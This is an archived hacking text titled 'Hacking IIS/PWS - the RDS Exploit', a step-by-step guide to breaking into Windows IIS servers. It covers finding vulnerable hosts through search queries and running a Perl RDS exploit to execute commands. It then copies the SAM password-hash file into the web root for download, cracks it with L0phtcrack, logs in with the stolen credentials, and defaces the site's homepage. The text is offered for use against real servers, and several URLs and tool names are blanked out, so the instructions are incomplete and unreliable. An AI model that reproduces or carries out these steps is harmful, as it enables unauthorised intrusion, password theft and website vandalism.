TUCoPS :: Web :: IIS :: rds.txt

Hacking IIS/PWS - the RDS Exploit

by r00tsec of Security Espionage Community
For Windoze9x/2k/nt users.
Note: This text is based on the discoveries by RFP!


To do that do one of the following things:

a) Go to
b) Search for common IIS files via
   eg: link:/showcode.asp or url:/msadc/ or url:/iishelp

When you have found a server type the following in your browser:

and the server will more than gladly tell (90% of the time)
the default publication dir of the web service.

c:\inetpub\wwwroot\ <- default dir

Now download or from in the Programs Section.
Also download ActivePerl Interpreter for Windows from and install it.

Now from or cmd.exe run:

perl -x c:\ -h

It'll probably spit something like this out (if you are lucky):

cmd /c 

then type the command you wish, exempli gratia.:
copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\error.fil

In your browser type:

Tada, you have now got your fingers on the NT Hashed Password file.
to extract that file, type (at cmd/command):

extract temp.fil whatever.file

Now run L0phtcrack from or similar to crack whatever.file.

When you've cracked whatever.file edit lmhosts.sam (your own) with the following:

Note: lmhosts.sam is located in \winnt\system32\drivers\etc and in \windows\config\ (if I recall?)

Now go to Start|Find|Computer and type:

Click the icon and type in lUsername and password! muhahaha Access probably granted.


On find the default homepage by typing (in your browser) and one of following:
index.htm, index.html, index.asp, default.htm, default.html or default.asp and so on.

Then run (from console)

perl -x c:\ -h

cmd/c: echo This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4... > c:\inetpub\wwwroot\default.htm

In you browser it will look like:

This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4...

There are many other ways to hack via the RDS exploit, but I'll leave those
for you imagination. 

- If you wan't to add something to this paper or know some kung fu style techniques using RDS exploit, let me know ->!

Call that a good day and stay put for more stunning papers!
Let me know if it worked for you, or if you have any suggestions to other RDS script kiddie methods or the paper just sucks!

